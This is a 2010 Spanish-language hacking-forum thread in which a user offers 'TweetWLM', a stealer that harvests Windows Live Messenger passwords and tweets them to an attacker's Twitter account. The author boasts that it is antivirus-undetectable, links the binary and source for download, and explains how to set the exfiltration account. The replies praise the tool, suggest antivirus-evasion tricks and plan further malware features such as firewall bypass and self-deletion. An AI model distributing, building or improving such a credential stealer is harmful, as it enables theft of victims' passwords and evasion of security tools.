elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM  (Leído 4,638 veces)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
[SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« en: 12 Julio 2010, 03:15 am »

Bueno, TweetWLM, como yo lo he bautizado, es una simple aplicacion programada por mi que recupera las contraseñas del WLM y las Tweetea en tu Twitter >:D >:D Es recomendable tener un twitter cerrado al publico para ese uso ::)

Es FUD:
Código:
http://www.virustotal.com/es/analisis/f34627c59552a4c0f721786488a3af25a85b6d9cdbb0f5f675621f8c471fdeea-1278896349
Estoy al corriente de que VT comparte las muestras, pero no me preocupa, cualquiera que tenga idea sobre programacion es capaz de hacer FUD el codigo de nuevo ;)

Descargar:
Bin:
Código:
http://www.box.net/shared/a8vpqkp5mf
Src:
Código:
http://www.box.net/shared/pozkqp2n7f

El codigo y el binario pertenecen unicamente al STUB asi que para establecer la cuenta de twitter donde se postearan las contraseñas teneis que seguir estas instrucciones:
  • Abrir el ejecutable con un programa que permita modificar la informacion de version del fichero
  • Poner en el valor 'Comments' la contraseña de la cuenta
  • Poner en el valor 'ProductName' el nombre de la cuenta
Ejemplo:


No se si queda muy claro este post, pero tengo sueño, asi que buenas noches :xD
« Última modificación: 12 Julio 2010, 03:17 am por Karcrack » En línea

Jaixon Jax


Desconectado Desconectado

Mensajes: 859



Ver Perfil
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #1 en: 12 Julio 2010, 03:41 am »

  Woooow Karcrack valla aportazo   ;D


  Descargando Source  :silbar: .......
En línea

[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #2 en: 12 Julio 2010, 13:45 pm »

Muy bueno, no viste el partido o que?  :xD. Me bajo el source a ver si entiendo algo, sino me los explicas por MSN  ;D.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #3 en: 12 Julio 2010, 14:17 pm »

Muy bueno, no viste el partido o que?  :xD. Me bajo el source a ver si entiendo algo, sino me los explicas por MSN  ;D.

Saludos
Claro que lo vi ::) ::) ::) ::) ::)
Esto lo tenia hecho hacia tiempo... y para celebrar que gano la roja lo he compartido con todos :)
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #4 en: 12 Julio 2010, 17:46 pm »

:xD vaya aporte.
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #5 en: 12 Julio 2010, 20:44 pm »

Tengo pensado para futuras versiones:
  • Añadir builder
  • Codificar usuario y contraseña del Twitter... eso de que este en texto plano no me mola nada..  pero soy muy vago :xD
  • Optimizar la compilacion del ejecutable... ya que son 20kb de stub... y se puede dejar tranquilamente en 9kb ;D
  • FWB
  • Melt
  • Mutex
  • Me estoy planteando continuar el proyecto en C :-\...

Saludos ;)
En línea

Horricreu
Wiki

Desconectado Desconectado

Mensajes: 290

¡La verdad os hará libres!


Ver Perfil WWW
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #6 en: 12 Julio 2010, 22:20 pm »

Luego voy a probarlo que tengo muchas ganas ;D Parece muy interesante...

Tengo pensado para futuras versiones:
  • Añadir builder
  • Codificar usuario y contraseña del Twitter... eso de que este en texto plano no me mola nada..  pero soy muy vago :xD
  • Optimizar la compilacion del ejecutable... ya que son 20kb de stub... y se puede dejar tranquilamente en 9kb ;D
  • FWB
  • Melt
  • Mutex
  • Me estoy planteando continuar el proyecto en C :-\...

Saludos ;)

Me gusta la última idea ;-) ;D

Saludos :P
En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #7 en: 14 Julio 2010, 21:26 pm »

me gusto la idea de poner los datos en los comentarios del exe.

con eso te sacas de ensima la heuristica de los av cuando detectan que te abris a vos mismo.

Muy bueno, ya veo el codigo.



esteeeee...

me trabe.
quise armar un builder y me di cuenta de que no tengo ni idea de como cambiar la informacion del ejecutable...

voy a googlear, si alguien sabe me avisa?
« Última modificación: 14 Julio 2010, 21:50 pm por Elemental Code » En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
« Respuesta #8 en: 15 Julio 2010, 14:30 pm »

La información está en el resource, tienes que utilizar las API's de manejo de recursos para encontrar leer y/o cambiar el valor.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines